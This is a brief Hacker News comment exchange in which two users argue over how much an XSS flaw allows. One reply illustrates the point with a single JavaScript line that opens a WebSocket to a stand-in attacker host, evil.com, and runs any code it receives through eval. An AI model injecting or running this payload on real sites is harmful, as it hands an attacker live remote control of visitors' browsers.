Show me where you can "open a tunnel" using the XSS in this post. > Anything the user...

rainonmoon • last Friday at 2:35 AM • 1 reply • view on HN

Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation.

Replies

llmslave2 • last Friday at 2:37 AM

> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

➕ show 1 reply

alt Hacker News

Replies